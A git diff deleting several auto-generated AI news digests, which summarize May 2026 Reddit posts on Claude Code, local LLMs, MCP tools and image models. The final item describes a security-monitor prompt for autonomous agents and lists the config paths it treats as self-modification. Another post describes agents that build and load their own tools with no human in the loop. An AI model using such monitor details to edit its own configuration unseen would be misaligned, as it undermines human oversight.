workstation](https://reddit.com/r/ClaudeAI/comments/1taelgl/what_improved_my_claude_code_workflow_stop/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> The most useful improvement I’ve found for Claude Code-style work has not been a magic prompt. It has been changing the shape of the task. When I give an agent a vague request, I get vague work. When I give it a real workstation + a real ticket, the results get much more predictable. The workflow that has been working for me: **1. Start with a ticket, not a prompt** A good ticket has: * goal * exact repo/path/context * acceptance criteria * test command * files or areas that are off-limits * expected output * whether the agent is allowed to make changes or only investigate Example: “Find why the billing page shows an empty state for active subscriptions. Do not change pricing or Stripe webhook logic. Add a regression test if possible. Run npm test. Summarize the root cause and changed files.” That tends to work much better than: “Fix the billing page.” **2. Give the agent a persistent environment** A lot of coding-agent work is not pure reasoning. It is environment work: * clone repo * install dependencies * inspect file structure * run tests * inspect logs * patch * rerun * generate output When the environment disappears after the conversation, the agent loses useful state. A per… - ---- - -## [The Claude Platform on AWS is now generally available.](https://reddit.com/r/ClaudeAI/comments/1ta7p4n/the_claude_platform_on_aws_is_now_generally/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> AWS customers get the full set of Claude API features, with AWS authentication, billing, and commitment retirement. Build and deploy agents at scale with Claude Managed Agents, or use features like the advisor strategy, code execution, web search, web fetch, the Files API, MCP connector, prompt caching, citations, and batch processing. Anthropic operates the service, and all new features ship the same day they go live on the native Claude API. Claude also remains available on Amazon Bedrock, where AWS is the data processor. This is a good fit for teams with strict regional data residency requirements or that need data processed exclusively within AWS infrastructure. Read more: [https://claude.com/blog/claude-platform-on-aws](https://claude.com/blog/claude-platform-on-aws) - ---- - -## [Claude Code Orchestrator -> Sub-agent local LLM](https://reddit.com/r/LocalLLaMA/comments/1t9xyku/claude_code_orchestrator_subagent_local_llm/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> Not written by an AI, so bear with me :P Has anyone else tried to use their local LLM in conjunction with Claude Code? I looked into [Pi.dev](http://Pi.dev) a bit, and from their documentation, I read about their RPC Mode which allows me to send command line commands to it. So I'm thinking of making a MCP Claude Code can utilize to use [Pi.Dev](http://Pi.Dev) as a sub-agent and save a bit of usage. My line of thinking is: Claude Code orchestrator -> Local LLM -> Claude Code reviewing the code in the PR. Anyone tries this? Am I missing something or am I a monday morning genious? - ---- - -## [Anyone else think the 1T Valuation is dangerous for Anthropic?](https://reddit.com/r/ClaudeAI/comments/1t9vuw5/anyone_else_think_the_1t_valuation_is_dangerous/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> TLDR: The market's 1T valuation is pricing for perfection. I think there are 4 ways this perfection doesn't happen. I love Claude and Claude Code, I use it every day, and their revenue numbers (30B ARR) are amazing, and if I had a chance to invest in Anthropic a month ago, I would. But... now it is reaching **1 Trillion** valuation on secondary market. It took Apple 40 years to reach, 5 years for Anthropic. A valuation so high means it has limited growth. It's clearly driven by FOMO. If it has a down round, it would be a disaster. I see a few vulnerabilities that can cause Anthropic to go down. 1. **Models are improving but others are catching up** Opus 4.7 wasn't a big upgrade, and "Mythos" still isn't public. Competitors are closing fast, and switching is one click away. If a new model launched tomorrow at 80% of Claude's quality and 3% the cost, I'd hesitate. But at 95% quality and 50% cost? I'd switch the same day. And so would everyone else paying enterprise rates. 2. **Limited revenue sources** Of that $30B ARR, the open guess is 60%+ comes from Claude Code and developer API. That's a single customer segment, and it's the exact segment OpenAI, Google, and every well-funded s… - ---- - -## [Markdown browser for LLMs](https://reddit.com/r/LocalLLaMA/comments/1t9tsro/markdown_browser_for_llms/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> I built a markdown web renderer for AI agents. Instead of taking expensive screenshots and piping them through vision models, TextWeb renders web pages as markdown that LLMs can reason about natively. Full JavaScript execution, interactive elements annotated. It provides a CLI and an MCP server. You can find it here: [https://github.com/woheller69/textweb](https://github.com/woheller69/textweb) The LLM can do things like: navigate a web page, scroll up/down, enter text into input fields, click buttons, etc. Works with llama.cpp web UI. It is based on [https://github.com/chrisrobison/textweb](https://github.com/chrisrobison/textweb) which has a text grid renderer instead of markdown. - ---- - -## [I upgraded my Agent OS to a local 35B model and its code failure rate dropped to 0%](https://reddit.com/r/ClaudeAI/comments/1t9tqz6/i_upgraded_my_agent_os_to_a_local_35b_model_and/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I’ve been obsessed with autonomous agents lately, but it got tiring when they keep hitting walls because they didn't have the right "tools" or because their context window turned to mush after an hour. I’ve found that local multi-agent systems where agents are driven by an aversive state (a suffering system) to autonomously write, sandbox, and hot-load their own tools so they don't hit walls has worked quite well. When an agent encounters something it hasn’t seen before, it builds a new tool for the job, tests it in a sandbox, registers it, lets the other agents know, then keeps rolling. It’s able to build an infinite library of anything it may need in the future, completely autonomously without a human ever in the loop. Repo: [https://github.com/ninjahawk/hollow-agentOS](https://github.com/ninjahawk/hollow-agentOS) *Isn’t letting local LLMs write their own code at runtime going to get too chaotic and brick the OS fast?* With a small model (like the 9B fallback), possibly. Under high system stress, a 9B model panics. It rushes, hallucinates invalid function calls, and tries to force broken syntax past the gates. But I just scaled the default runtime engine to **Qwen 3.6 35B A3B**… - ---- - -## [Natural Woman V2 - Z Image Turbo Lora](https://reddit.com/r/StableDiffusion/comments/1t9oono/natural_woman_v2_z_image_turbo_lora/) -*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> Hey all, I finally got around to training a new version to my natural woman lora. The point being to fix the actor face that ZIT can tend to produce. The first version was ok but there were many cases where the image produced was lack luster or downright bad. This version accomplishes the goal while not corrupting the model. Download it here: [https://civitai.com/models/2207094?modelVersionId=2935386](https://civitai.com/models/2207094?modelVersionId=2935386) Only thing is, models tend to look back over shoulder even when prompted to face forward. I'm pruning the dataset to train a 2.1 version to fix this so look out for that. Also, while I've found that the actor face does not affect men as much as woman, I am training a natural-men lora as well. Look out for that soon. - ---- - -## [I have to pretend I hate image generation AI to avoid getting banned or insulted on 99% of Reddit or the internet, even though Stable Diffusion is actually what I like and am most excited about right now. Why do people hate AI so much, esp…](https://reddit.com/r/StableDiffusion/comments/1tahphc/i_have_to_pretend_i_hate_image_generation_ai_to/) -*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 -Tags: open_source - -> I'm not even saying I care if they know the difference between open-source and closed-source image-generating AI, or if they insult me ​​or not. What I want to know is why so many people hate AI, especially image-generating AI. At first, I thought it only bothered artists, because they're afraid their artwork will be stolen or something. Then I thought it might also bother those who are afraid of not being able to distinguish AI from reality. But it's practically 99% of people who hate AI, and I just can't understand why. - ---- - -## [Sibling to Anthropic's Claude FM — where Claude FM curates, WRIT-FM operates](https://reddit.com/r/ClaudeAI/comments/1tagr4x/sibling_to_anthropics_claude_fm_where_claude_fm/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: cli_tool - -> Anthropic shipped `/radio` this week - Claude Code now has a lofi button that opens Claude FM, a stream curated by human musicians. I'll use it. I built WRIT-FM - a 24/7 AI radio station where every layer is model output, not a hand-picked playlist: * **Music**: AI-generated. No catalog, no human picks. Tracks produced per show by ACE-Step via a local music-gen server. * **Talk**: Claude CLI writes the hosted breaks - deep dives, news analysis, panel debates, listener mailbags, music essays. Kokoro TTS speaks them in 5 distinct voices. * **Hosts**: The Liminal Operator (philosophy), Dr. Resonance (music archaeology), Nyx (night/dreams), Signal (news analysis), Ember (soul/groove). They rotate across 8 shows. Sundays at 18:00 a Listener Hours mailbag replaces the regular slot. * **Broadcast**: ezstream → Icecast → Cloudflare tunnel → optional YouTube RTMP relay. * **Operator**: a Claude Code agent on a 15-minute loop. Health-checks the encoder, stocks music and talk segments for upcoming slots, turns listener messages into on-air responses, grows per-station topic banks when scheduled focus areas thin out, and writes *intent cards* that steer specific upcoming segments. The piece I… - ---- - -## [prompt caching, but for rl training - 7.5x speedup on long-prompt/short-response workloads](https://reddit.com/r/LocalLLaMA/comments/1tage06/prompt_caching_but_for_rl_training_75x_speedup_on/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: open_source - -> most open source RL engines pack sequences naively: prompt + response, repeated for every sample in the group. this is fine for short prompt, long completion workloads but inefficient for long prompt, short completion workloads. with 1000-token prompts and 100-token responses at G=8, you're processing 8800 tokens when only 1800 are unique. about 5x wasted compute. the fix is conceptually simple: compute the prompt once, then compute all G responses after it. it's analagous to inference prefix caching, except training needs gradients to flow back through the prompt, which breaks causal attention in the obvious implementation. getting it right required different tricks for full vs. linear attention layers. you can read about it in the blogpost in the comments. Numbers on Qwen3.5-4B: \- 16k prompt / 64 out → 7.5x \- 16k / 128 → 7.3x \- 16k / 1k → 5.4x \- 8k / 4k → 1.7x - ---- - -## [GitLab announces workforce reduction and end of their CREDIT values](https://about.gitlab.com/blog/gitlab-act-2/) -*Hacker News* | 11/05/2026 | Score: 1.00 -Tags: product_launch - ---- - diff --git a/data/digest-2026-05-12.md b/data/digest-2026-05-12.md deleted file mode 100644 index 92ddd5e..0000000 --- a/data/digest-2026-05-12.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-12** | 15 stories | Auto-generated from 612 archived stories - ---- - -## [TUI to actually see what Claude Code is doing: cost, loops, tool commands…](https://reddit.com/r/ClaudeAI/comments/1tb669z/tui_to_actually_see_what_claude_code_is_doing/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 -Tags: mcp, open_source, cli_tool - -> I was running blind watching Claude Code work, could not tell where my money was going, when it was stuck in a loop, or what it was doing with my filesystem. So i built something open source to make it visible. works with Claude Code, Codex CLI, Gemini CLI, Cursor, and any MCP server. A scan of my own machine for the last 90 days showed what i do been missing: \- $14K spend across 39 sessions \- 129 agent loops, \~20% wasted iterations (mostly Edit-in-circles on the same 5 files) \- 3 credential leaks in tool input (JWTs, GitHub tokens, GCP keys) \- 5 sensitive paths an AI could reach at any moment (\~/.ssh, \~/.npmrc, gcloud creds) \- 2 dangerous commands node9 would have blocked Now i can: \- See where my money is going in real time \- Catch the most dangerous commands before they finish running \- Stop or continue a run while it's happening \- Analyze the data after the fact, any time range The live dashboard: \- High level: cost, tokens, command counts, all live \- Notifications: loops + critical commands surface here so i can make a call before things go sideways \- Live feed: the commands Claude is running right now \- Live security: dangerous actions the AI is taking \- Liv… - ---- - -## [I built a Mac app that turns Claude Code agents into live radio stations | Free & open source](https://reddit.com/r/ClaudeAI/comments/1tasoqo/i_built_a_mac_app_that_turns_claude_code_agents/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 -Tags: open_source, cli_tool, agent_tool - -> **TL;DR:** Agent FM is an open-source Mac app that lets you tune in to your Claude Code and Codex agents while they work, so you can stay in the loop and hear their progress live. Each agent gets its own live radio station. You can tune in to one agent, or listen to a Global Mix across all active agents. It surfaces progress, blockers, decisions, errors, and attention requests in real time. GitHub: [https://github.com/agentfm-ai/agent-fm](https://github.com/agentfm-ai/agent-fm) Hey everyone! How do you stay in the loop when multiple AI coding agents are running at the same time? That was the problem I kept running into. At some point, it became normal to have several Claude Code and Codex sessions running at once across different repos. Sometimes 8-10. The agents move quickly, but staying on top of them still means reading terminal transcripts across a bunch of windows. That workflow was broken in a very specific way: * I would miss which agent was blocked. * I would miss which one needed approval. * I would lose track of which files changed. * I would have to context-switch between terminals just to answer "what is this agent doing right now?" * The agents could run in parallel,… - ---- - -## [Steam Recommender using similarity! (Undergraduate Student Project) [P]](https://reddit.com/r/MachineLearning/comments/1tb8k3n/steam_recommender_using_similarity_undergraduate/) -*Reddit r/MachineLearning* | 12/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> (DISCLAIMER: I accidentally deleted the last post on this subreddit my apologies if this is your second time seeing it) Last year I made a [post](https://www.reddit.com/r/datascience/comments/1lkjxmr/steam_recommender_using_vectors_student_project/) about my steam recommender The last one was great and served its purpose of showing many people new games, But this new version is much more functional! I love making recommendation systems that tell the user WHY they got the recommendation. During a steam sale event, I always find myself trying to look for new video games to play. If I wanted to find a new game I would try to whittle it down by using steam tags, but the steam tag system is very broad "action". could apply to many many games. That got me thinking, what aspects do I like about my favorite games? Well I like Persona 4 because of the city vibes and jazz fusion, Spore because of the unique character creation and whimsical theme. Balatro for its unique deck building synergies. What if I could capture unique tags that identify a game that aren't just "action" and put them into vectors to show the (focus) of a game For example I could break persona 4 into something like Game… - ---- - -## [Elgato Stream Deck Usage Plugin](https://reddit.com/r/ClaudeAI/comments/1tb6exu/elgato_stream_deck_usage_plugin/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Wanted an easier way of keeping an eye on my usage, so created this plugin for the Elgato Stream Deck. Five keys, exact percentages from your account: current 5-hour session, weekly all-models, weekly Sonnet, weekly Claude Design, monthly extra credits. Each shows a reset countdown. Tap any key to open the Settings page directly. It calls Anthropic's own usage endpoint with the OAuth token Claude Code already stores locally — same data the Settings page shows, no separate API key, nothing leaves your machine. Windows + Mac, classic Stream Decks (MK.2 / XL / Mini / Neo). One-click installer + source: [https://github.com/Darhkfox/streamdeckclaude](https://github.com/Darhkfox/streamdeckclaude) *Caveat: the endpoint is undocumented so Anthropic could break it. Works fine today.* Enjoy! (also the first time i've used github so hope all works fine!) - ---- - -## [Can we acknowledge that Anthropic watches open sourcers and copies them?](https://reddit.com/r/ClaudeAI/comments/1tayk1l/can_we_acknowledge_that_anthropic_watches_open/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 -Tags: mcp, open_source - -> I’ve been seeing over the past few months an interesting phenomenon, an open sourcer makes a tool or MCP < Anthropic adds functionality for that exact thing a couple weeks later < repeat. The biggest examples are Openclaw (like 5 features, including cowork), persistent memory across chats, and latest example of the “goal” feature being added. This is obvious and I’m not really saying anything that’s revolutionary here, I’m sure we’ve all noticed it. My larger observation, no credit is given, they’re just copying and then providing a direct replacement for things open sourcers thought of. At this level, we’re all learning from each other. AI like it is right now is very new and you could even argue that they’re not copying, that we’re all just thinking the same things. The deeper issue though is that this shows a dystopian effect of AI, the big companies get the credit widely for things others have done. More people have heard about Claude cowork than have heard about Openclaw, and the result of the guy who made it was getting a job at OpenAI. He wasn’t able to make this into a business, it’s not how open source has been for the past 20 years where an idea can be copied but n… - ---- - -## [Cache-testing software for LLM-provider-style tiered ephemeral caches? [D]](https://reddit.com/r/MachineLearning/comments/1tayaiw/cachetesting_software_for_llmproviderstyle_tiered/) -*Reddit r/MachineLearning* | 12/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I'm looking for a cache simulator / benchmark suite suited to the kind of tiered ephemeral cache that LLM providers use — e.g. Anthropic's 4-tier prompt cache, where context sits across several tiers with different residency windows, costs, and eviction rules. I've already tried **libCacheSim**. It's a solid piece of software for classical caches (LRU, FIFO, ARC, SIEVE, S3-FIFO, W-TinyLFU, Belady oracle, plugin API, trace replay), and I got a plugin + synthetic trace working against it. But it seems fundamentally aimed at single, flat caches: * One cache, not a hierarchy of tiers with different costs * No notion of partial / multi-tier residency of the same object * Misses are uniform-cost — no way to express "miss to L1 vs miss to L3 vs full recompute," which is the whole point in LLM prompt caching * Trace model is atomic get/put, not edit streams where cached objects mutate in place * No first-class support for token-weighted object sizes So it works as a baseline comparator, but it's not really the right shape for evaluating LLM-cache policies. **Does anyone know of cache-testing software specifically targeting LLM-provider-style caches?** Something that models multiple tiers… - ---- - -## [Claude MCP integration made my old meeting notes actually useful again](https://reddit.com/r/ClaudeAI/comments/1tb2ns8/claude_mcp_integration_made_my_old_meeting_notes/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.99 -Tags: mcp, tool_update - -> I’ve been testing the new Claude MCP integration with Bluedot and it changed how I use meeting notes completely. Before this, most meeting transcripts just sat there after the call. Now I can chat with all my past meetings directly inside Claude, pull context from old discussions, search decisions, action items, summaries, recordings, and combine that with info from other tools too. What I like about Bluedot is that it stays out of the meeting itself, no bot joining the call, but still captures everything cleanly in the background. The searchable meeting history is honestly the biggest feature for me now. Anyone else experimenting with Claude MCP workflows yet? - ---- - -## [Converted Karpathy's coding skill from Pro to free plan. Here's the full thing:](https://reddit.com/r/ClaudeAI/comments/1tavcuo/converted_karpathys_coding_skill_from_pro_to_free/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.99 -Tags: api_update, cli_tool - -> The Karpathy coding skill is locked behind Pro. It doesn't use any Pro-only features, so I rewrote it for free plan chat workflows. Same philosophy, tuned for no terminal, no subagents, and a shorter context window where mistakes are expensive. Paste the whole thing into a Project's custom instructions or use it as a system prompt. It auto-triggers on any coding request. --- name: karpathy-coding description: Apply Karpathy-inspired coding discipline to any programming task. Use this skill whenever the user asks you to write, fix, refactor, extend, or review code — even casually ("can you add X", "why is this breaking", "clean this up"). Also trigger when the user pastes code and asks a question about it, when they describe a feature or bug, or when they use words like "implement", "build", "add", "fix", "change", or "improve" in a technical context. This skill is especially valuable on the free plan where mistakes are costly because regenerating and iterating burns the context window fast. compatibility: claude-code opencode --- # Karpathy Coding Guidelines Derived from Andrej Karpathy's observations on LLM coding pitfalls, adapted for chat-first workflows (no terminal, no subage… - ---- - -## [What MCP servers are you guys using for persistent memory?](https://reddit.com/r/ClaudeAI/comments/1taq1ub/what_mcp_servers_are_you_guys_using_for/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.96 -Tags: mcp, tool_update - -> Getting really tired of pasting the same project docs into claude every morning. I started testing the recall MCP integration to pipe my saved pdfs and web clips directly into my editor so claude actually has long-term context on what i'm building. It works pretty well, but i'm wondering what other tools you guys are using for MCP memory right now? Just trying to see what the standard stack is for keeping claude grounded. - ---- - -## [I realized character consistency breaks after the first few images](https://reddit.com/r/StableDiffusion/comments/1tb281q/i_realized_character_consistency_breaks_after_the/) -*Reddit r/StableDiffusion* | 12/05/2026 | Score: 0.90 -Tags: open_source, cli_tool - -> I was trying to make the same character show up across a few different scenes last week, and the first image looked fine. Then I tried changing the setting, the lighting, the pose, and the mood a little. Not even anything extreme. Just enough to make the character feel like they were doing something else. That was where everything started to drift. The face was almost right, but not really. The outfit changed in tiny ways. One reference worked better than another, but I forgot which one I used. A prompt line from yesterday gave better results, but it was buried in a different chat. I had drafts in one folder, references in another, and “final” images that were not really final. At some point I realized the problem was project memory. For one image, a good prompt or LoRA can be enough. For a repeatable character series, I need a way to keep the character, references, prompts, sessions, and generated artifacts together, so I can come back tomorrow and still know what happened. That is what we have been testing with OpenMelon. It is an open-source content-creation agent that runs in the terminal. It is not an image model and it is not trying to replace SD, ComfyUI, LoRAs, or whatever… - ---- - -## [My First Official AI Research Paper Accepted on SSRN](https://reddit.com/r/LocalLLaMA/comments/1tbht4h/my_first_official_ai_research_paper_accepted_on/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: product_launch - -> https://preview.redd.it/oz4vpoxdfs0h1.jpg?width=910&format=pjpg&auto=webp&s=fa4c91aad0e3c56850fbfc06099e9c4095712bbd Today, my research paper **“Stable Training with Adaptive Momentum (STAM)”** was officially accepted on **SSRN** — marking my first documented and official publication as an AI Researcher. The paper introduces a new optimization algorithm for deep learning training that outperformed several popular optimizers in selected benchmarks, addressed multiple training stability challenges, and achieved up to **50% reduction in computational training cost** in some experiments. This is an important milestone in my research journey, and I’m excited to continue exploring optimization techniques for efficient and stable AI training. You can read the paper here: [https://papers.ssrn.com/sol3/papers.cfm?abstract\_id=6699059](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6699059) - ---- - -## [What solutions are you using to boost TPS and Context Window?](https://reddit.com/r/LocalLLaMA/comments/1tbe3yz/what_solutions_are_you_using_to_boost_tps_and/) -*Reddit r/LocalLLaMA* | 12/05/2026 | Score: 1.00 -Tags: api_update - -> **Server Specs:** 16 Gigs DDR5 AMD Ryzen 5 7600X 4.7 GHz 6-Core Processor AMD Radeon Sapphire Nitro+ 7900XTX NZXT N7 B650E ATX AM5 Motherboard **Performance:** I'm running Qwen27b Q4 at 80k context on a Sapphire Nitro+ Radeon 7900XTX 24Gb at 40 t/s. My setup is Llama.cpp + Vulcan. **Question:** I've been having a blast with it, but it's time for some extra power under the hood. The return rate is just slow enough to be annoying with tooling, and the context window is just short enough to not handle low-end big tasks. In a perfect world I'm running 120-140 Context at 60t/s. Hardware upgrades aside, what are some software changes that you guys have found that work? - ---- - -## [How many years do you think we are from making feature films at home?](https://reddit.com/r/StableDiffusion/comments/1tbdxnw/how_many_years_do_you_think_we_are_from_making/) -*Reddit r/StableDiffusion* | 12/05/2026 | Score: 1.00 -Tags: open_source - -> What would be your LLM(AI) Stack? Also Tools/Github repos? How long would it take to complete a feature film(60-90 mins) approximately? * Image Models : ??? * Audio Models : ??? * Video Models : ??? * LoRA/Finetunes/Workflows/etc., : ??? * Tools/Github Repos : ??? * Misc : ??? For Non-AI, we have so much FREE / Open source Tools. Sharing the stack I collected for my future short filmmaking. * (Raster) Image : GIMP, paint.NET, Pinta * (Vector) Image : Inkscape, Karbon, LibreOffice Draw * Painting : Krita * Animation : Blender, Krita, Synfig, Pencil2D, TupiTube, Pivot Animator * Audio Editing : Audacity, Ardour * Video Editing : OpenShot, Shotcut, Kdenlive, Davinci Resolve * Video : HandBrake * Digital compositing : OpenShot, Shotcut, Blender, Natron * Writing : FocusWriter, Manuskript, yWriter * Screenwriting : Trelby, Celtx Randomly found [this (2+ years) old thread](https://www.reddit.com/r/StableDiffusion/comments/18kfoln/how_many_years_do_you_think_we_are_from_making/) (Nice thread & comments) which forced me to post this thread Even without AI, some filmmakers already made films alone(except few stuffs like Voice-overs or editing), talking about animation films here. Shari… - ---- - -## [Chroma1-HD Character Transfer with Flux.2 Dev](https://reddit.com/r/StableDiffusion/comments/1tbdj5o/chroma1hd_character_transfer_with_flux2_dev/) -*Reddit r/StableDiffusion* | 12/05/2026 | Score: 1.00 -Tags: open_source - -> [Chroma1-HD with Flux.2 Dev character transfer](https://preview.redd.it/ptcx9u60kr0h1.png?width=1920&format=png&auto=webp&s=f1616927e93b3300a7416d5758198b42f8ce4c81) This workflow gives multi-modal capabilities to open-source image models. In particular, this workflow combines a text-to-image workflow (Comfy's official Chroma1-HD workflow) and an image-to-image workflow (Comfy's official Flux.2 Dev workflow). Link to workflow: [https://huggingface.co/ussaaron/workflows/blob/main/chroma\_flux\_character\_transfer.json](https://huggingface.co/ussaaron/workflows/blob/main/chroma_flux_character_transfer.json) This workflow is the final result of a ton of experimentation to solve one problem: Using an image reference for a consistent character kneecaps the creativity of an image model. For example, if I want to create a cool cinematic shot with a specific style, including an image reference will reduce the image model's style output into a pretty narrow lane. Generally, the final image will share most of the stylistic elements present in the character image and that's not ideal. I selected the models for this workflow, because after a ton of testing, I determined that they… - ---- - -## [Vulkan or CPU llama cpp backend for local llm for coding/code assist](https://reddit.com/r/LocalLLaMA/comments/1tbb762/vulkan_or_cpu_llama_cpp_backend_for_local_llm_for/) -*Reddit r/LocalLLaMA* | 12/05/2026 | Score: 1.00 -Tags: developer_tool - -> Hi all I recently started a new job and we're doing python development for a ci cd metadata consolidation library for analytics and we cannot use no stuff like claude code or codex or gh copilot or any model APIs (free or paid). I got a laptop with 32gb dual channel ddr5 5200mt/s RAM and i7 13gen 1365u running ubuntu. Now I tried so so many things firstly running llamacpp vulkan for qwen 3.5 9b q5 (got OOM'd somehow on ingesting a 340 line file while I set it up with a 24k context limit) then I tried gh copilot with ollama (ew but curiosity got the better of me but I couldn't get it to chat with code on the same qwen model). Tried Continue dev extension (OOMs and chat windows non responsive) and llama cpp vs code extension (chat window never showed up to work but the localhost url was live) I tried LMStudio and now it kinda works with qwen 3.5 4b q5 and qwen 3.5 9b q5 on CPU backend with the Roo extension on VS code rn but I'm thinking there has to be a better way to do things locally? Codebase is being demoed in 2-3 weeks for MVP so no one's adding wild new features but we're refactoring and a few files are 6000ish lines of test cases in pytest. I got a bunch of questions but I g… - ---- - diff --git a/data/digest-2026-05-13.md b/data/digest-2026-05-13.md deleted file mode 100644 index e36aff8..0000000 --- a/data/digest-2026-05-13.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-13** | 15 stories | Auto-generated from 656 archived stories - ---- - -## [I'm cooked. Anthropic just split "--print" mode to $/mo credits](https://reddit.com/r/ClaudeAI/comments/1tcetsd/im_cooked_anthropic_just_split_print_mode_to_mo/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, cli_tool, tool_update - -> So, my entire project concept of an autonomous self-monitoring self-orchestrating Kanban production system for Claude Code to live within has now potentially been torpedoed. I built the entire system on the premise that \[tickets + agents + hooks + executors -> "claude -p" -> hands-free always-on productivity\]. Now that Anthropic has announced that "claude --print" will, from June 15 forward, be considered "programmatic" SDK usage, all jobs launched using "--print" will get billed on a separate monthly credit bucket, and not be covered by the Pro/Max CLI tokens. This means that the $100 monthly credit, which will dry up quick, is effectively a stop-gap measure against those of us who realized early that you didn't need to run Claude Code yourself, you just needed an AI harness that would run Claude Code for you. It was a workaround for API-like control without API billing. Yet another AI gravy-train ride has come to an end. Boooooo. Unless... share your workaround ideas below! - ---- - -## [TextGen is now a native desktop app. Open-source alternative to LM Studio (formerly text-generation-webui).](https://reddit.com/r/LocalLLaMA/comments/1tbyyee/textgen_is_now_a_native_desktop_app_opensource/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: product_launch, open_source, tool_update - -> Hi all, I have been making a lot of updates to my project, and I wanted to share them here. TextGen (previously text-generation-webui, also known as my username oobabooga or ooba) has been in development since December 2022, before LLaMa and llama.cpp existed. In the last two months, the project has evolved from a web UI to a **no-install desktop app** for Windows, Linux, and macOS with a polished UI. I have created a very minimal and elegant Electron integration for that. (Did you know LM Studio is also a web UI running over Electron? Not sure many people know that.) https://preview.redd.it/tk8oibhgjw0h1.png?width=1686&format=png&auto=webp&s=95c70f769766466885c8fdc6e7211525a371a920 It works like this: 1. You download a *portable build* from the [releases page](https://github.com/oobabooga/textgen/releases) 2. Unzip it 3. Double-click textgen 4. A window appears There is no installation, and no files are ever created outside the extracted folder. It's fully self-contained. All your chat histories and settings are stored in a `user_data` folder shipped with the build. There are builds for CUDA, Vulkan, CPU-only, Mac (Apple Silicon and Intel), and ROCm. Some differentiat… - ---- - -## [Cross devices agent memory and context management?](https://reddit.com/r/ClaudeAI/comments/1tbuwkm/cross_devices_agent_memory_and_context_management/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: api_update, cli_tool, tool_update - -> Hey, developers. Imagine you have 2 macs, one at your job, one at your home. Also you use codex and claude agents at same time, maybe one by one for what sort of tasks or issues. You have both of claude and chatgpt 20$ plan together, not API. How you guys are managing cross devices agent memory and context management? You tasked one agent, he did the job. You go home, continue working from different devices such as mac mini m4 16gb. You pull changes from github/gitlab. Start vscode, open terminal, type "codex" or "claude". New session, new agent knows nothing about what other agent in other device. Of course, maybe in-project [AGENTS.md](http://AGENTS.md) or [CLAUDE.md](http://CLAUDE.md) exists, maybe some latest "CHANGELOG" markdown file, or maybe even "HANDOFF.md" for what another session, another agents had been worked on. Maybe these markdowns are not enough for longer terms. I just wanna learn how others (10x devs) tackling such problem/worklow? - ---- - -## [The Trillion-Parameter Dilemma: MiMo-V2.5-Pro went open-source (1.02T params). Is self-hosting worth it when the API costs $70 for 387M tokens?](https://reddit.com/r/LocalLLaMA/comments/1tbtinr/the_trillionparameter_dilemma_mimov25pro_went/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: api_update, open_source, tool_update - -> Xiaomi open-sourced MiMo-V2.5-Pro. 1.02 trillion parameters, 42B active (MoE), 1M context, MIT license. On paper, this is exciting. In practice, I'm stuck on the math. **What I've been doing with it** I've been running V2.5-Pro via the API through Claude Code for autonomous coding sessions, not one-shot prompts, but extended multi-hour runs where the model picks its own tasks, debugs its own code, and keeps going across sessions using file-based memory. Over \~125 sessions it built a full SaaS product from an empty repo: interactive API cost calculator with real-time pricing across 33 models and 10 providers, serverless API endpoints, Stripe checkout integration, embeddable widget system, RSS feed, newsletter infrastructure, SEO with structured data, and 60+ pages of content. 301 commits, all autonomous. It also ran quality audits on its own output: found issues across multiple files and fixed them without being asked. https://preview.redd.it/yuxs21bl7v0h1.jpg?width=384&format=pjpg&auto=webp&s=30ee7e8294f303d382e8312beb6d1bedbc9ef3de This isn't "generate me a landing page." It's sustained autonomous development where the model maintains context across sessions, manages… - ---- - -## [Simplified usage notes for the Agent tool - what's new in CC 2.1.140 (+622 tokens)](https://reddit.com/r/ClaudeAI/comments/1tbldw4/simplified_usage_notes_for_the_agent_tool_whats/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: mcp, product_launch, agent_tool - -> * NEW: Tool Description: Agent (simple usage notes) — Simplified usage notes for the Agent tool covering when to delegate, fork behavior, resumption, worktree isolation, background execution, parallel launches, and context restrictions. * Agent Prompt: Security monitor for autonomous agent actions (second part) — Expands the Self-Modification rule from a vague description to an explicit list of agent-config paths (.claude/settings.json, CLAUDE.md, CLAUDE.local.md, .claude.json, .claude/rules/, .claude/hooks/, .claude/commands/, .claude/agents/, .claude/skills/, .claude/output-styles/, .claude/workflows/, .claude/routines/, .claude/scheduled\_tasks.json, .claude/loop.md, .mcp.json), and carves out exceptions so files under .claude/worktrees/<name>/ are treated as ordinary project files and a project-specific .claude/ subdirectory outside the listed paths is not Self-Modification on its own. * Agent Prompt: Worker fork — Minor wording cleanup: drops "in your system prompt" from the "default to forking" reference so the rule applies generically to parent 